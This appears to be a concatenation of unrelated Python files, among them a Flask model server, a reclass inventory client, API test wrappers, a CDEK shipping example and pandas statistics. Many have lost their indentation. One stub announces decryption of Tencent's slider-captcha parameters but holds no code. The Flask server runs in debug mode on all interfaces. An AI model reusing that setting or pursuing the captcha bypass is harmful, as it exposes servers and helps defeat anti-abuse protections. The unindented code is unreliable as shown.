except Exception as e:
print e
print "XXXXXXXXXX Failed to attach ip! XXXXXXXXXXX"
for i in range(0,NR_OF_WORKERS):
init(i)
# wait_time = 260
# for i in range(0,26):
# time.sleep(10)
# wait_time -= 10
# print str(wait_time)+"s remaining..."
# for ip in floating_ips:
# ssh = paramiko.SSHClient()
# ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# cmd = "cd /home/ubuntu/acc_project; celery worker -l info -A airfoil &"
# sshkey = paramiko.RSAKey.from_private_key_file('/Users/admin/Desktop/acc/lab3/svensskey.pem')
# try:
# ssh.connect(str(ip),username="ubuntu",pkey=sshkey)
# print "CONNECTED!"
# stdin, stdout, stderr = ssh.exec_command(cmd)
# print "running cmd " + str(cmd)
# except Exception as e:
# print e
# print "ERRROR SSHING!!!!!!"
# ssh.close()
|
HTML_SPACE = ' '
def prefill_with_character(value, column_length=4, fill_char=HTML_SPACE):
"""Prepend value with fill_char for given column_length"""
str_val = str(value)
fill_length = column_length - len(str_val)
return fill_char*fill_length + str_val
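# Illustrative example: prefill_with_character(42) returns '&nbsp;&nbsp;42',
# i.e. the value right-aligned in a 4-character HTML column.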
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
from pycdek import AbstractOrder, AbstractOrderLine, Client
class Product(models.Model):
title = models.CharField('Название', max_length=255)
weight = models.PositiveIntegerField('Вес, гр.')
price = models.DecimalField('Цена', max_digits=12, decimal_places=2)
class Order(AbstractOrder, models.Model):
    sender_city_id = 44  # if we always ship from Moscow
sender_city_postcode = models.PositiveIntegerField()
recipient_name = models.CharField('Имя получателя', max_length=100)
recipient_phone = models.CharField('Телефон', max_length=20)
recipient_city_id = models.PositiveIntegerField()
recipient_city_postcode = models.PositiveIntegerField()
    recipient_address_street = models.CharField('Улица', max_length=100, null=True, blank=True)
    # max_length is not a valid kwarg for PositiveIntegerField, so it is dropped here
    recipient_address_house = models.PositiveIntegerField('Номер дома', null=True, blank=True)
    recipient_address_flat = models.PositiveIntegerField('Номер квартиры', null=True, blank=True)
    pvz_code = models.CharField('Код пункта самовывоза', max_length=10, null=True, blank=True)
shipping_tariff = models.PositiveIntegerField('Тариф доставки')
shipping_price = models.DecimalField('Стоимость доставки', max_digits=12, decimal_places=2, default=0)
comment = models.TextField('Комментарий', blank=True)
is_paid = models.BooleanField('Заказ оплачен', default=False)
def get_number(self):
return self.id
def get_products(self):
return self.lines.all()
def get_comment(self):
return self.comment
class OrderLine(AbstractOrderLine, models.Model):
order = models.ForeignKey(Order, related_name='lines')
product = models.ForeignKey(Product)
quantity = models.PositiveIntegerField('Количество', default=1)
def get_product_title(self):
return self.product.title
def get_product_upc(self):
return self.product.id
def get_product_weight(self):
return self.product.weight
def get_quantity(self):
return self.quantity
def get_product_price(self):
return self.product.price
def get_product_payment(self):
if self.order.is_paid:
return 0
else:
            return self.product.price  # payment on delivery
client = Client('login', 'password')
product = Product.objects.create(title='Шлакоблок', weight=1000, price=500)
# order to Novosibirsk with self-pickup
Order.objects.create(
    recipient_name='Иванов Иван Иванович',
    recipient_phone='+7 (999) 999-99-99',
    recipient_city_id=270,  # Novosibirsk
    recipient_city_postcode=630066,  # Novosibirsk
    shipping_tariff=137,  # self-pickup
    is_paid=True
)
# order to Saint Petersburg with courier delivery and payment on delivery
order = Order.objects.create(
    recipient_name='Иванов Иван Иванович',
    recipient_phone='+7 (999) 999-99-99',
    recipient_city_id=137,  # Saint Petersburg
    recipient_city_postcode=198261,  # Saint Petersburg
    recipient_address_street='пр. Ленина',
    recipient_address_house=1,
    recipient_address_flat=1,
    shipping_tariff=136,  # courier delivery
    comment='Позвонить за час'
)
OrderLine.objects.create(product=product, order=order)
# create the order
response = client.create_order(order)
dispatch_number = response['DispatchNumber']
# fetch the waybill for the order
with open('Заказ #%s.pdf' % order.get_number(), 'wb') as f:
    data = client.get_orders_print([dispatch_number])
    f.write(data)
# track the order's delivery status
client.get_orders_statuses([dispatch_number])
# get information about the order
client.get_orders_info([dispatch_number])
# delete (cancel) the order
client.delete_order(order)
|
from common.run_method import RunMethod
import allure
@allure.step("极客数学帮(家长APP)/订单/计算订单总价(旧)")
def app_order_countOrderPrice_post(params=None, body=None, header=None, return_json=True, **kwargs):
    '''
    :param: query parameters appended to the URL
    :body: request body
    :return_json: whether to return the response as JSON (default: True)
    :header: request headers
    :host: environment (host) to send the request to
    :return: the JSON response by default; the raw response when return_json=False
    '''
name = "极客数学帮(家长APP)/订单/计算订单总价(旧)"
url = f"/service-order/app/order/countOrderPrice"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("通用/报名/app端获取可使用优惠及优惠券")
def app_order_queryMatchDiscountAndCoupon_post(params=None, body=None, header=None, return_json=True, **kwargs):
    '''
    :param: query parameters appended to the URL
    :body: request body
    :return_json: whether to return the response as JSON (default: True)
    :header: request headers
    :host: environment (host) to send the request to
    :return: the JSON response by default; the raw response when return_json=False
    '''
name = "通用/报名/app端获取可使用优惠及优惠券"
url = f"/service-order/app/order/queryMatchDiscountAndCoupon"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/订单/计算订单总价")
def app_order_calculateOrderPrice_post(params=None, body=None, header=None, return_json=True, **kwargs):
    '''
    :param: query parameters appended to the URL
    :body: request body
    :return_json: whether to return the response as JSON (default: True)
    :header: request headers
    :host: environment (host) to send the request to
    :return: the JSON response by default; the raw response when return_json=False
    '''
name = "极客数学帮(家长APP)/订单/计算订单总价"
url = f"/service-order/app/order/calculateOrderPrice"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/订单/新增订单")
def app_order_saveOrder_post(params=None, body=None, header=None, return_json=True, **kwargs):
    '''
    :param: query parameters appended to the URL
    :body: request body
    :return_json: whether to return the response as JSON (default: True)
    :header: request headers
    :host: environment (host) to send the request to
    :return: the JSON response by default; the raw response when return_json=False
    '''
name = "极客数学帮(家长APP)/订单/新增订单"
url = f"/service-order/app/order/saveOrder"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/我的/订单")
def app_order_queryOrderGeneralForApp_get(params=None, header=None, return_json=True, **kwargs):
    '''
    :param: query parameters appended to the URL
    :return_json: whether to return the response as JSON (default: True)
    :header: request headers
    :host: environment (host) to send the request to
    :return: the JSON response by default; the raw response when return_json=False
    '''
name = "极客数学帮(家长APP)/我的/订单"
url = f"/service-order/app/order/queryOrderGeneralForApp"
res = RunMethod.run_request("GET", url, params=params, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/我的/订单/查询订单详情")
def app_order_queryOrderDetailForApp_get(params=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/我的/订单/查询订单详情"
url = f"/service-order/app/order/queryOrderDetailForApp"
res = RunMethod.run_request("GET", url, params=params, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/我的/优惠券/根据优惠券查询学生可报名班级")
def app_coupon_couponForAppClasses_get(params=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/我的/优惠券/根据优惠券查询学生可报名班级"
url = f"/service-order/app/coupon/couponForAppClasses"
res = RunMethod.run_request("GET", url, params=params, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/报名/app端下单前的预验证")
def app_order_preValidOrderCondition_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/报名/app端下单前的预验证"
url = f"/service-order/app/order/preValidOrderCondition"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/订单/查询订单状态")
def app_order_queryStatus_get(params=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/订单/查询订单状态"
url = f"/service-order/app/order/queryStatus"
res = RunMethod.run_request("GET", url, params=params, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/订单/释放座位")
def app_order_cancle_seat_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/订单/释放座位"
url = f"/service-order/app/order/cancle/seat"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/订单/验证学生重复生成订单")
def app_order_studentHasOrder_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/订单/验证学生重复生成订单"
url = f"/service-order/app/order/studentHasOrder"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/订单1/查询订单状态1")
def app_order_queryTest_get(params=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/订单1/查询订单状态1"
url = f"/service-order/app/order/queryTest"
res = RunMethod.run_request("GET", url, params=params, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/订单/预占座位")
def app_order_take_seat_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/订单/预占座位"
url = f"/service-order/app/order/take/seat"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/报名/获取可使用优惠")
def app_order_discounts_queryMatchDiscount_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/报名/获取可使用优惠"
url = f"/service-order/app/order/discounts/queryMatchDiscount"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/订单/订单状态修改")
def app_order_updateStatus_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/订单/订单状态修改"
url = f"/service-order/app/order/updateStatus"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/订单/新增订单(旧)")
def app_order_save_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/订单/新增订单(旧)"
url = f"/service-order/app/order/save"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/订单管理/查询订单")
def app_order_query_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/订单管理/查询订单"
url = f"/service-order/app/order/query"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/订单管理/二维码查询订单")
def app_order_qr_query_get(params=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/订单管理/二维码查询订单"
url = f"/service-order/app/order/qr/query"
res = RunMethod.run_request("GET", url, params=params, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/我的/优惠券张数")
def app_coupon_countValidCouponItemByStudentIdForApp_get(params=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/我的/优惠券张数"
url = f"/service-order/app/coupon/countValidCouponItemByStudentIdForApp"
res = RunMethod.run_request("GET", url, params=params, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/我的/优惠券/优惠券列表")
def app_coupon_selectCouponItemsByStudentIdForApp_get(params=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/我的/优惠券/优惠券列表"
url = f"/service-order/app/coupon/selectCouponItemsByStudentIdForApp"
res = RunMethod.run_request("GET", url, params=params, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/我的/优惠券/优惠券详情")
def app_coupon_selectCouponItemByIdForApp_get(params=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/我的/优惠券/优惠券详情"
url = f"/service-order/app/coupon/selectCouponItemByIdForApp"
res = RunMethod.run_request("GET", url, params=params, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/订单/获取可使用优惠券")
def app_coupon_queryMatchCoupon_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/订单/获取可使用优惠券"
url = f"/service-order/app/coupon/queryMatchCoupon"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/用户购课单/计算促销活动价格")
def app_order_calculatePromotion_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/用户购课单/计算促销活动价格"
url = f"/service-order/app/order/calculatePromotion"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
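# A hedged usage sketch for the wrappers above (the parameter and header names
# here are illustrative assumptions; the real field names come from the
# service's API contract):
def example_query_order_status(order_id, auth_header):
    # GET /service-order/app/order/queryStatus with the order id as a query param
    return app_order_queryStatus_get(params={"orderId": order_id}, header=auth_header)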
|
import pickle
from code import compute_model
with open('dataset.pickle', 'rb') as f:
dataset = pickle.load(f)
# flag pairs of entries that share an input but disagree on the expected output
for i in range(len(dataset)):
for j in range(i + 1, len(dataset)):
if dataset[i]["input"] == dataset[j]["input"] and dataset[i]["output"] != dataset[j]["output"]:
print("Found conflicting labels:", i, "and", j)
print(dataset[i])
print(dataset[j])
# compare the model's output against the expected output for every entry
for i, entry in enumerate(dataset):
expected_output = entry["output"]
out = compute_model(entry["input"])
for j in range(len(out)):
if expected_output[j] != out[j]:
print("Found mismatch in output", j, ", expected:", expected_output[j], ", out:", out[j])
if out == expected_output:
print(i, ": matches")
else:
print(i, ": error")
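# A hedged alternative sketch: the pairwise scan above is O(n^2); hashing each
# input brings it down to O(n). pickle.dumps is used on the assumption that the
# "input" values are picklable (they need not be hashable themselves):
seen = {}
for idx, entry in enumerate(dataset):
    key = pickle.dumps(entry["input"])
    if key in seen and dataset[seen[key]]["output"] != entry["output"]:
        print("Found conflicting labels:", seen[key], "and", idx)
    seen.setdefault(key, idx)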
|
import base64
import os
import re
from flask import request, Flask, jsonify
from PIL import Image
from train import train
from predict import predict
from utils import decode_image
app = Flask(__name__)
@app.route("/", methods=["GET"])
def home():
return "Fashion AI"
@app.route("/train", methods=["GET"])
def train_api():
# hyperparameters arrive as query-string arguments
model_name = request.args.get("model_name", type=str)
num_epochs = request.args.get("num_epochs", 10, type=int)
batch_size = request.args.get("batch_size", 3, type=int)
valid_size = request.args.get("valid_size", 0.2, type=float)
seed = request.args.get("seed", 259, type=int)
device = request.args.get("device", "none", type=str)
num_workers = request.args.get("num_workers", -1, type=int)
use_wandb = request.args.get("use_wandb", 0, type=int)
project_name = request.args.get("project_name", "fashion_ai", type=str)
entity = request.args.get("entity", "nagahamavh", type=str)
use_tqdm = request.args.get("use_tqdm", 0, type=int)
if device == "none":
device = None
use_wandb = use_wandb == 1
use_tqdm = use_tqdm == 1
train(model_name, num_epochs=num_epochs, batch_size=batch_size,
valid_size=valid_size, seed=seed, device=device,
num_workers=num_workers, use_wandb=use_wandb,
project_name=project_name, entity=entity, use_tqdm=use_tqdm)
return "Modelo " + model_name + " treinado com sucesso"
@app.route("/predict", methods=["GET"])
def predict_api():
received_image = request.args.get('image')
model_name = request.args.get('model_name', type=str)
device = request.args.get("device", "none", type=str)
if device == "none":
device = None
image = decode_image(received_image)
image, info = predict(image, model_name, device)
image_pil = Image.fromarray(image)
os.makedirs("output", exist_ok=True) # make sure the output directory exists
image_pil.save("output/new_image.png")
with open("output/new_image.png", "rb") as f:
encoded_image = base64.b64encode(f.read()).decode("utf-8")
return jsonify({"image": encoded_image, "info": info})
@app.route("/get_models", methods=["GET"])
def get_models():
all_files = os.listdir("./pretrained_models")
all_files = [re.sub(r'\.\w+$', '', string) for string in all_files]
models = list(set(all_files))
return jsonify(models)
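# A hedged client-side sketch (not wired into the app): how one might call the
# /predict endpoint, assuming the server runs on localhost:5000, that the
# `requests` package is installed, and that decode_image accepts a base64 string.
def example_predict_client(image_path, model_name):
    import requests  # assumption: available in the client environment
    with open(image_path, "rb") as f:
        image_b64 = base64.b64encode(f.read()).decode("utf-8")
    resp = requests.get("http://localhost:5000/predict",
                        params={"image": image_b64, "model_name": model_name})
    return resp.json()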
if __name__ == "__main__":
app.run(host="0.0.0.0", port=5000, debug=True)
|
# -*- coding: utf-8 -*-
import os
import yaml
import six
from string import Template
from django.conf import settings
from reclass import get_storage
from reclass.core import Core
from reclass.settings import Settings
from architect.inventory.client import BaseClient
from architect.inventory.models import Resource, Inventory
from celery.utils.log import get_logger
logger = get_logger(__name__)
class HierDeployClient(BaseClient):
def __init__(self, **kwargs):
super(HierDeployClient, self).__init__(**kwargs)
def check_status(self):
logger.info('Checking status of hierarchy deploy "{}" ...'.format(self.name))
try:
self.inventory()
status = True
except Exception as exception:
logger.error(exception)
status = False
return status
def update_resources(self):
inventory = Inventory.objects.get(name=self.name)
for resource, metadata in self.inventory().items():
res, created = Resource.objects.get_or_create(uid=resource,
inventory=inventory)
if created:
res.name = resource
res.kind = 'reclass_node'
res.metadata = metadata
res.save()
else:
if res.metadata != metadata:
res.metadata = metadata
res.save()
self.get_overrides()
def inventory(self, resource=None):
'''
Get inventory nodes from reclass salt formulas and their
associated services and roles.
'''
storage = get_storage('yaml_fs',
self.metadata['node_dir'],
self.metadata['class_dir'])
settings = Settings({'no_refs': False,
'pretty_print': True,
'output': 'yaml'
})
reclass = Core(storage, None, settings)
if resource is None:
return reclass.inventory()["nodes"]
else:
return reclass.inventory()["nodes"][resource]
def parameter_list(self, resource=None):
# not implemented for this client; returns an empty mapping
resource_list = {}
return resource_list
def class_list(self, resource=None):
resource_list = {}
for node_name, node in self.inventory().items():
role_class = []
for service_name, service in node['parameters'].items():
if service_name not in settings.RECLASS_SERVICE_BLACKLIST:
for role_name, role in service.items():
if role_name not in settings.RECLASS_ROLE_BLACKLIST:
role_class.append('{}-{}'.format(service_name,
role_name))
resource_list[node_name] = role_class
if resource is None:
return resource_list
else:
return {resource: resource_list[resource]}
def resource_create(self, name, metadata):
file_name = '{}/{}.yml'.format(self.metadata['node_dir'], name)
with open(file_name, 'w+') as file_handler:
yaml.safe_dump(metadata, file_handler, default_flow_style=False)
def resource_delete(self, name):
file_name = '{}/{}.yml'.format(self.metadata['node_dir'], name)
os.remove(file_name)
inventory = Inventory.objects.get(name=self.name)
resource = Resource.objects.get(inventory=inventory, name=name)
resource.delete()
def save_override_param(self, name, value):
if 'cluster_name' not in self.metadata:
return
file_name = '{}/overrides/{}.yml'.format(self.metadata['class_dir'],
self.metadata['cluster_name'],)
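# NB: overrides are written under overrides/ here, while init_overrides()
# and get_overrides() read and write deployment/<cluster_name>.yml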
inventory = Inventory.objects.get(name=self.name)
inventory.cache['overrides'][name] = value
inventory.save()
metadata = {
'parameters': {
'_param': inventory.cache['overrides']
}
}
with open(file_name, 'w+') as file_handler:
yaml.safe_dump(metadata, file_handler, default_flow_style=False)
def init_overrides(self):
if 'cluster_name' not in self.metadata:
return
file_name = '{}/deployment/{}.yml'.format(self.metadata['class_dir'],
self.metadata['cluster_name'],)
default_params = {
'cluster_name': self.metadata['cluster_name'],
'cluster_domain': self.metadata['cluster_domain']
}
metadata = {
'parameters': {
'_param': default_params
}
}
with open(file_name, 'w+') as file_handler:
yaml.safe_dump(metadata, file_handler, default_flow_style=False)
inventory = Inventory.objects.get(name=self.name)
inventory.cache['overrides'] = default_params
inventory.save()
def get_overrides(self):
if 'cluster_name' not in self.metadata:
return {}
file_name = '{}/deployment/{}.yml'.format(self.metadata['class_dir'],
self.metadata['cluster_name'],)
if not os.path.isfile(file_name):
self.init_overrides()
with open(file_name, 'r') as file_handler:
metadata = yaml.safe_load(file_handler.read()) # safe_load avoids arbitrary object construction
return metadata.get('parameters', {}).get('_param', {})
def classify_node(self, node_name, node_data=None):
'''
Classify node by the current class_mapping dictionary
'''
if node_data is None: # avoid a shared mutable default argument
node_data = {}
inventory = Inventory.objects.get(name=self.name)
node_data = {k: v for (k, v) in node_data.items() if not k.startswith('__pub_')}
classes = []
node_params = {}
cluster_params = {}
for type_name, node_type in inventory.cache.get('class_mapping', {}).items():
valid = self._validate_condition(node_data, node_type.get('expression', ''))
if valid:
gen_classes = self._get_node_classes(node_data, node_type.get('node_class', {}))
classes = classes + gen_classes
gen_node_params = self._get_params(node_data, node_type.get('node_param', {}))
node_params.update(gen_node_params)
gen_cluster_params = self._get_params(node_data, node_type.get('cluster_param', {}))
cluster_params.update(gen_cluster_params)
if classes:
node_metadata = {
'classes': classes + ['deployment.{}'.format(self.name.replace('.', '-'))],
'parameters': {
'_param': node_params,
'linux': {
'system': {
'name': node_name.split('.')[0],
'domain': '.'.join(node_name.split('.')[1:])
}
}
}
}
inventory.client().resource_create(node_name, node_metadata)
self.update_resources()
if len(cluster_params) > 0:
for name, value in cluster_params.items():
self.save_override_param(name, value)
def _get_node_classes(self, node_data, class_mapping_fragment):
classes = []
for value_tmpl_string in class_mapping_fragment.get('value_template', []):
value_tmpl = Template(value_tmpl_string.replace('<<', '${')
.replace('>>', '}'))
rendered_value = value_tmpl.safe_substitute(node_data)
classes.append(rendered_value)
for value in class_mapping_fragment.get('value', []):
classes.append(value)
return classes
def _get_params(self, node_data, class_mapping_fragment):
params = {}
for param_name, param in class_mapping_fragment.items():
value = param.get('value', None)
value_tmpl_string = param.get('value_template', None)
if value:
params.update({param_name: value})
elif value_tmpl_string:
value_tmpl = Template(value_tmpl_string.replace('<<', '${')
.replace('>>', '}'))
rendered_value = value_tmpl.safe_substitute(node_data)
if value_tmpl_string.replace('<<', '${').replace('>>', '}') != rendered_value:
params.update({param_name: rendered_value})
return params
def _validate_condition(self, node_data, expressions):
"""
Allow string expression definition for single expression conditions
"""
if isinstance(expressions, six.string_types):
expressions = [expressions]
result = []
for expression_tmpl_string in expressions:
expression_tmpl = Template(expression_tmpl_string.replace('<<', '${')
.replace('>>', '}'))
expression = expression_tmpl.safe_substitute(node_data)
if expression and expression == 'all':
result.append(True)
elif expression:
val_a = expression.split('__')[0]
val_b = expression.split('__')[2]
condition = expression.split('__')[1]
if condition == 'startswith':
result.append(val_a.startswith(val_b))
elif condition == 'equals':
result.append(val_a == val_b)
return all(result)
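# A minimal illustration of the expression grammar _validate_condition expects
# (inferred from the parsing above; the variable name below is a hypothetical
# example, not part of the module):
if __name__ == '__main__':
    node_data = {'minion_id': 'web01.example.com'}
    tmpl = Template('<<minion_id>>__startswith__web'.replace('<<', '${').replace('>>', '}'))
    expression = tmpl.safe_substitute(node_data)
    val_a, condition, val_b = expression.split('__')
    # 'web01.example.com' starts with 'web' -> the condition holds
    assert condition == 'startswith' and val_a.startswith(val_b)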
|
'''
Look at crops from an experiment, given some property filters.
'''
import config
import numpy as np
import os
from lib.Database import Database
import matplotlib.pyplot as plt
import shutil
# scale factor between pixels and physical size (assumed to be microns per pixel)
PIXEL_SCALE = 13.94736842
async def main(args):
await view_crops()
async def view_crops():
directory = '/home/mot/tmp/C3_cropviewer_nonvalid'
os.makedirs(directory, exist_ok=True) # make sure the destination exists
db = Database()
plt.ion()
experiment_uuid = 'b6e60b0d-ca63-4999-9f29-971b9178ad10'
diameter_low = 200
diameter_high = 700
area_low = ((diameter_low / (2.0 * PIXEL_SCALE)) ** 2) * np.pi
area_high = ((diameter_high / (2.0 * PIXEL_SCALE)) ** 2) * np.pi
s = """
SELECT p.experiment, f.frame, t.track, p.area
FROM particle p, frame f, track t
WHERE p.particle = t.particle
AND t.frame = f.frame
AND f.experiment = p.experiment
AND p.experiment = '{experiment_uuid}'
AND p.area > {area_low}
AND p.area < {area_high}
AND p.valid = True
"""
q = s.format(
experiment_uuid=experiment_uuid,
area_low=area_low,
area_high=area_high
)
async for result in db.query(q):
diameter = (2.0 * np.sqrt(result["area"] / np.pi)) * 13.94736842
# Do stuff with the rows
# Make the filename
srcFile = os.path.join(config.experiment_dir,
str(result["experiment"]),
str(result["frame"]),
str(result["track"])+'.jpg')
dstFile = os.path.join(directory, str(round(diameter))+"-"+
str(result["track"])+'.jpg')
shutil.copyfile(srcFile, dstFile)
# load the file
#img = plt.imread(srcFile)
# show the file
#plt.imshow(img, cmap='gray')
# waitfor user input
#plt.waitforbuttonpress(0)
#MSBOT-010160000003C4_VT
#35e29212-a136-4083-91d1-42b96d0bf75e (detection)
#dd6b9512-cfcb-47e9-91eb-537bff1e6d3d (tracking)
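# A small optional sketch, mirroring the commented-out viewer code above, for
# stepping through the copied crops (assumes an interactive matplotlib backend):
def browse_crops(directory):
    import glob
    for path in sorted(glob.glob(os.path.join(directory, '*.jpg'))):
        img = plt.imread(path)
        plt.imshow(img, cmap='gray')
        plt.title(os.path.basename(path))
        plt.waitforbuttonpress(0)  # advance on any key or mouse press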
|
# -*- coding: utf-8 -*-
# __author__ = "zok" 362416272@qq.com
# Date: 2019-10-15 Python: 3.7
"""
腾讯防水墙
【不提供完整代码】
仅提供部分参数以供参考
"""
# 滑块参数解密
|
# Descriptive statistics for a pandas DataFrame
# Import modules
import pandas as pd
data = {'name': ['Jason', 'Molly', 'Tina', 'Jake', 'Amy'],
'age': [42, 52, 36, 24, 73],
'preTestScore': [4, 24, 31, 2, 3],
'postTestScore': [25, 94, 57, 62, 70]}
df = pd.DataFrame(data, columns = ['name', 'age', 'preTestScore', 'postTestScore'])
print(df)
#Sum of all ages
df['age'].sum()
#Mean preTestScore
df['preTestScore'].mean()
#Cumulative sum of preTestScores, moving from the top row downward
df['preTestScore'].cumsum()
#Summary statistics on preTestScore
df['preTestScore'].describe()
#Count the number of non-NA values
df['preTestScore'].count()
#Minimum value of preTestScore
df['preTestScore'].min()
#Maximum value of preTestScore
df['preTestScore'].max()
#Median value of preTestScore
df['preTestScore'].median()
#Sample variance of preTestScore values
df['preTestScore'].var()
#Sample standard deviation of preTestScore values
df['preTestScore'].std()
#Kurtosis of preTestScore values
df['preTestScore'].kurt()
#Correlation matrix of values (numeric_only=True skips the non-numeric
#'name' column; required in recent pandas versions)
df.corr(numeric_only=True)
#Covariance matrix of values
df.cov(numeric_only=True)
|
from django.test import TestCase
from .models import StopWord
class SimpleTest(TestCase):
def test_serialization(self):
"""Tests the serialization of a StopWord
"""
